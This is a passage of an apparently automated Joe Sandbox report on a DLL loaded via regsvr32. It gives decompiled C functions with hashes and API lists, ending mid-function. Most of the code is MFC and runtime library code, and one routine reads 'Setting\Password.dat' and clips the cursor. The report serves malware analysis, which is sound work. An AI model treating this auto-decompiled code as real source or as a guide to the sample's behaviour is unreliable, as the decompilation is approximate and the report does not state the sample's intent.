                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 4605bdd22261624fc1273dbfd4e681a595f8f7bd52795e84bc67e913853e72a7
                                                                                                                • Instruction ID: d448b202a891be26d177328d71540db7f52179dd4c801e5203996c4e8ca581b4
                                                                                                                • Opcode Fuzzy Hash: 4605bdd22261624fc1273dbfd4e681a595f8f7bd52795e84bc67e913853e72a7
                                                                                                                • Instruction Fuzzy Hash: A441AF316483409BD320CB208C92B9BB7E5EF85355F584B18F9559F2D2E772EA48C791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001C549 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E1001C549(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E10022C52(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E10023187(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E1003D47E(__eflags)));
					_t33 = E1003D47E(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1003D617(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E1003D47E(_t69)));
					_t52 = E1003D47E(_t69);
					_push(_a4);
					 *_t52 = 0;
					E1003D617(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E1003D47E(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E1003D47E(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E10017114( *((intOrPtr*)(E1003D47E(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E10018524(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(E1001C4BB(_t55, _t57, 0, _t62, _t71) == 0) {
							E10023F14(_t57);
						}
					}
					return _t62;
				}
			}




























                                                                                                                0x1001c559
                                                                                                                0x1001c561
                                                                                                                0x1001c569
                                                                                                                0x1001c59e
                                                                                                                0x1001c5a5
                                                                                                                0x1001c5a8
                                                                                                                0x1001c5ad
                                                                                                                0x1001c5b0
                                                                                                                0x1001c5b2
                                                                                                                0x1001c5b5
                                                                                                                0x1001c5b8
                                                                                                                0x1001c5c6
                                                                                                                0x00000000
                                                                                                                0x1001c570
                                                                                                                0x1001c570
                                                                                                                0x1001c573
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001c57c
                                                                                                                0x1001c57f
                                                                                                                0x1001c584
                                                                                                                0x1001c587
                                                                                                                0x1001c594
                                                                                                                0x1001c5ce
                                                                                                                0x1001c5ce
                                                                                                                0x1001c5d3
                                                                                                                0x1001c5d5
                                                                                                                0x1001c5e6
                                                                                                                0x1001c5eb
                                                                                                                0x1001c5ee
                                                                                                                0x1001c5d7
                                                                                                                0x1001c5de
                                                                                                                0x1001c5e3
                                                                                                                0x1001c5e3
                                                                                                                0x1001c5f3
                                                                                                                0x1001c5f4
                                                                                                                0x1001c5f5
                                                                                                                0x1001c5f6
                                                                                                                0x1001c5fe
                                                                                                                0x1001c600
                                                                                                                0x1001c605
                                                                                                                0x1001c60d
                                                                                                                0x1001c613
                                                                                                                0x1001c619
                                                                                                                0x1001c61f
                                                                                                                0x1001c625
                                                                                                                0x1001c626
                                                                                                                0x1001c629
                                                                                                                0x1001c62c
                                                                                                                0x1001c62f
                                                                                                                0x1001c632
                                                                                                                0x1001c63c
                                                                                                                0x1001c63e
                                                                                                                0x1001c63e
                                                                                                                0x1001c63c
                                                                                                                0x1001c649
                                                                                                                0x1001c649

                                                                                                                APIs
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C594
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C5C6
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                • API String ID: 3029210900-2801496823
                                                                                                                • Opcode ID: 333637defcf45e8313df684a811178f8c81ddf9b6db8f5b4b46f02d966457cc3
                                                                                                                • Instruction ID: d972ff4ffa584f777f92cac134705a8847247c5c9bfb85dde4d4857cc9004a4d
                                                                                                                • Opcode Fuzzy Hash: 333637defcf45e8313df684a811178f8c81ddf9b6db8f5b4b46f02d966457cc3
                                                                                                                • Instruction Fuzzy Hash: A13170B9D0060DEFCB12EFA9D841D8EBBF5EF08251F104066F914AB211D770EA90DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009BE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E10009BE0(void* __ecx, RECT* __edx, void* __edi, void* __ebp, void* __eflags) {
				char _v4;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v120;
				void* _v224;
				char _v228;
				char _v236;
				char _v240;
				struct tagRECT _v256;
				void* __ebx;
				void* __esi;
				signed int _t33;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t76;
				void* _t79;
				void* _t82;

				_t82 = __eflags;
				_t74 = __edi;
				_t73 = __edx;
				_push(0xffffffff);
				_push(E10051361);
				_push( *[fs:0x0]);
				_t33 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t33 ^ _t79 - 0x000000e8);
				 *[fs:0x0] =  &_v12;
				_t76 = __ecx;
				E10021017(__ecx, __edi);
				E100205E2( &_v228, _t82);
				_push(0);
				_push(0x40);
				_push("Setting\\Password.dat");
				_v4 = 0;
				_t38 = E10020A24( &_v228, __edx, _t82);
				_t83 = _t38;
				if(_t38 == 0) {
					E10012C70(0);
					_v20 = 1;
					_t40 = E10021343(0,  &_v228, __edx, __edi, _t76, __eflags);
					__eflags = _t40 - 1;
					if(_t40 != 1) {
						do {
							E10018B24(_t76, 0x10057aa0, 0, 0);
							_v28 = 2;
							E10021AF5( &_v120, __edi, _t76, __eflags);
							_v28 = 0;
							E10020C98( &_v236, _t74, _t76, __eflags);
							E10012C70(0);
							_v32 = 1;
							_t48 = E10021343(0,  &_v240, __edx, _t74, _t76, __eflags);
							__eflags = _t48 - 1;
						} while (_t48 != 1);
					}
					_v16 = 0;
					E10008C00();
				} else {
					E10020580(0,  &_v240);
					GetWindowRect( *(_t76 + 0x20),  &_v256);
					_v256.top = _v256.top + 0x1e;
					_v256.left = _v256.left + 0xa;
					_v256.right = _v256.right - 0xa;
					_v256.bottom = _v256.bottom - 0xa;
					_t73 =  &_v256;
					ClipCursor( &_v256);
				}
				_v16 = 0xffffffff;
				E100206EF(0,  &_v240, _t73, _t74, _t76, _t83);
				 *[fs:0x0] = _v24;
				return 1;
			}

























                                                                                                                0x10009be0
                                                                                                                0x10009be0
                                                                                                                0x10009be0
                                                                                                                0x10009be0
                                                                                                                0x10009be2
                                                                                                                0x10009bed
                                                                                                                0x10009bf6
                                                                                                                0x10009bfd
                                                                                                                0x10009c05
                                                                                                                0x10009c0b
                                                                                                                0x10009c0d
                                                                                                                0x10009c16
                                                                                                                0x10009c1d
                                                                                                                0x10009c1e
                                                                                                                0x10009c20
                                                                                                                0x10009c29
                                                                                                                0x10009c30
                                                                                                                0x10009c35
                                                                                                                0x10009c37
                                                                                                                0x10009c7c
                                                                                                                0x10009c85
                                                                                                                0x10009c8d
                                                                                                                0x10009c92
                                                                                                                0x10009c95
                                                                                                                0x10009c97
                                                                                                                0x10009ca0
                                                                                                                0x10009cac
                                                                                                                0x10009cb4
                                                                                                                0x10009cbd
                                                                                                                0x10009cc4
                                                                                                                0x10009cce
                                                                                                                0x10009cd7
                                                                                                                0x10009cdf
                                                                                                                0x10009ce4
                                                                                                                0x10009ce4
                                                                                                                0x10009c97
                                                                                                                0x10009ced
                                                                                                                0x10009cf4
                                                                                                                0x10009c39
                                                                                                                0x10009c3d
                                                                                                                0x10009c4b
                                                                                                                0x10009c51
                                                                                                                0x10009c5b
                                                                                                                0x10009c5f
                                                                                                                0x10009c63
                                                                                                                0x10009c67
                                                                                                                0x10009c6c
                                                                                                                0x10009c6c
                                                                                                                0x10009cfd
                                                                                                                0x10009d08
                                                                                                                0x10009d19
                                                                                                                0x10009d29

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10009CB4
                                                                                                                  • Part of subcall function 10020580: CloseHandle.KERNEL32(000000FF), ref: 1002058F
                                                                                                                  • Part of subcall function 10020580: GetLastError.KERNEL32(?,00000000,?,1002073F,00000010), ref: 100205B4
                                                                                                                • GetWindowRect.USER32 ref: 10009C4B
                                                                                                                • ClipCursor.USER32(?), ref: 10009C6C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipCloseCursorErrorHandleLastRectTask_implWindowlstrlen
                                                                                                                • String ID: Setting\Password.dat
                                                                                                                • API String ID: 2701217368-1754286627
                                                                                                                • Opcode ID: c1d1bf8ec7f58d1d16a60e7e9fd7f9c19ea953c6c2c7c449cc09f10ed1687830
                                                                                                                • Instruction ID: 7fdc33bab3f21b8ff2c69fda66046c078474f5097c893bf9ed9bb2d73ed06e14
                                                                                                                • Opcode Fuzzy Hash: c1d1bf8ec7f58d1d16a60e7e9fd7f9c19ea953c6c2c7c449cc09f10ed1687830
                                                                                                                • Instruction Fuzzy Hash: 7C3140780483819FE324DB24D891FAFB7E5EF94354F40492DF49942582EB35AA08CF63
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015C0D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 356ba05f74cac8944baaa89dd961476bd924575323f166557d3ed5bfcef7fcb3
                                                                                                                • Instruction ID: 455198fe55c0233317231f3666cbef1b3bb113cec9faf2e7746caa1284f20c57
                                                                                                                • Opcode Fuzzy Hash: 356ba05f74cac8944baaa89dd961476bd924575323f166557d3ed5bfcef7fcb3
                                                                                                                • Instruction Fuzzy Hash: 311160726483409FD320CA618C42F9FB3E8EB85711F194A1CFA559F1D1E772EA488B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001AE98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001AE98(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1002D9C0(__ebx, _t25, __ebp, 0xc);
				_push(E1001A21A);
				_t26 = E1002D1BB(__ebx, 0x10070ad8, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1001729E(_t21, 0x10070ad8, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E1002DA2D(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E10018792(_t21, 0x10070ad8, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}











                                                                                                                0x1001ae98
                                                                                                                0x1001ae98
                                                                                                                0x1001ae98
                                                                                                                0x1001ae9b
                                                                                                                0x1001aea0
                                                                                                                0x1001aeaf
                                                                                                                0x1001aeb1
                                                                                                                0x1001aeb3
                                                                                                                0x1001aeb5
                                                                                                                0x1001aeb5
                                                                                                                0x1001aeba
                                                                                                                0x1001aebe
                                                                                                                0x1001aef8
                                                                                                                0x1001aefa
                                                                                                                0x00000000
                                                                                                                0x1001aec0
                                                                                                                0x1001aec0
                                                                                                                0x1001aec5
                                                                                                                0x1001aecd
                                                                                                                0x1001aed0
                                                                                                                0x1001aedc
                                                                                                                0x1001aee2
                                                                                                                0x1001aee4
                                                                                                                0x1001aee7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001aeec
                                                                                                                0x1001aef2
                                                                                                                0x1001aef2
                                                                                                                0x00000000
                                                                                                                0x1001aed2

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002D9C0: EnterCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D9FC
                                                                                                                  • Part of subcall function 1002D9C0: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA0B
                                                                                                                  • Part of subcall function 1002D9C0: LeaveCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA18
                                                                                                                  • Part of subcall function 1002D9C0: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA24
                                                                                                                  • Part of subcall function 1002D1BB: __EH_prolog3_catch.LIBCMT ref: 1002D1C2
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001A21A,0000000C), ref: 1001AEDC
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1001AEEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                • API String ID: 2853499158-63838506
                                                                                                                • Opcode ID: 22437ce6a35056d78bd2381d953ef84ef7d2e637a5dc36ff30e61c36f9131e95
                                                                                                                • Instruction ID: 61f40ce6bb001f17a784296407782c6632abb58eb1890d6c41790b6c3921499c
                                                                                                                • Opcode Fuzzy Hash: 22437ce6a35056d78bd2381d953ef84ef7d2e637a5dc36ff30e61c36f9131e95
                                                                                                                • Instruction Fuzzy Hash: E101C831404713EBD711EFA0ED09B4B77D0EF49752F008819F596A9861CB30DCD09B22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004735E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1004735E() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1005e7e0;
					_v28 =  *0x1005e7d8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                0x10047363
                                                                                                                0x1004736b
                                                                                                                0x10047382
                                                                                                                0x1004732e
                                                                                                                0x10047337
                                                                                                                0x10047343
                                                                                                                0x10047346
                                                                                                                0x10047349
                                                                                                                0x1004734b
                                                                                                                0x1004734e
                                                                                                                0x10047353
                                                                                                                0x1004735d
                                                                                                                0x10047355
                                                                                                                0x10047359
                                                                                                                0x10047359
                                                                                                                0x1004736d
                                                                                                                0x10047373
                                                                                                                0x1004737b
                                                                                                                0x00000000
                                                                                                                0x1004737d
                                                                                                                0x1004737d
                                                                                                                0x10047381
                                                                                                                0x10047381
                                                                                                                0x1004737b

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,1003C1C4), ref: 10047363
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10047373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 2d59ff89ac0dd6fbb30913566da9440524686e14bcae27ae8b3f9bffbcfe6194
                                                                                                                • Instruction ID: 21b191febf41880ee88891c179b8a5da762f4a99b1468043d4cf4c0a0f9574bc
                                                                                                                • Opcode Fuzzy Hash: 2d59ff89ac0dd6fbb30913566da9440524686e14bcae27ae8b3f9bffbcfe6194
                                                                                                                • Instruction Fuzzy Hash: 26F05430900A1DD2FF00AFB5AD492AE7AB8FB44743F9245E0E5D5E1084DF308574E646
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000BEB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000BEB0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _t14;
				struct HINSTANCE__* _t18;
				signed int _t20;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						_t18 = GetModuleHandleA( *(__ecx + 0xc));
						 *(_t24 + 4) = _t18;
						if(_t18 == 0) {
							_t20 = LoadLibraryA( *(_t24 + 0xc));
							 *(_t24 + 4) = _t20;
							 *((char*)(_t24 + 8)) = _t20 & 0xffffff00 | _t20 != 0x00000000;
						}
					}
					 *((intOrPtr*)(_t24 + 0x2c)) = GetProcAddress( *(_t24 + 4), "ImageList_ReplaceIcon");
				}
				_t14 = _a4;
				 *_t14 =  *((intOrPtr*)(_t24 + 0x2c));
				return _t14;
			}







                                                                                                                0x1000beb1
                                                                                                                0x1000beb7
                                                                                                                0x1000bebd
                                                                                                                0x1000bec3
                                                                                                                0x1000becb
                                                                                                                0x1000bece
                                                                                                                0x1000bed4
                                                                                                                0x1000bedc
                                                                                                                0x1000bee2
                                                                                                                0x1000bee2
                                                                                                                0x1000bece
                                                                                                                0x1000bef4
                                                                                                                0x1000bef4
                                                                                                                0x1000befa
                                                                                                                0x1000befe
                                                                                                                0x1000bf01

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,1000BF79,DF7C0CDA,?), ref: 1000BEC3
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 1000BED4
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_ReplaceIcon,?,1000BF79,DF7C0CDA,?), ref: 1000BEEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_ReplaceIcon
                                                                                                                • API String ID: 310444273-3264144174
                                                                                                                • Opcode ID: 8596cf452618ef1ebe18b7b474570471b20d2769ec82f521d7f34733b24ab3b8
                                                                                                                • Instruction ID: ff58c14875363006036c20859c02123cdca75185277630665b08a81ea7473ee4
                                                                                                                • Opcode Fuzzy Hash: 8596cf452618ef1ebe18b7b474570471b20d2769ec82f521d7f34733b24ab3b8
                                                                                                                • Instruction Fuzzy Hash: 08F0B275601B518FE720CF79C848A43BBE8EB1C651F01C82EE5AAC3A10DB34E940CF10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10032D33 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10032D33(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x1006dbdc; // 0xdf7c0cda
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1003D1E6(E100548FA, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1005f9f4,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E1002F7C9( &_a12,  &_a20, 0x100600f0);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E1002F7C9( &_a12,  &_a68, 0x100600d8);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
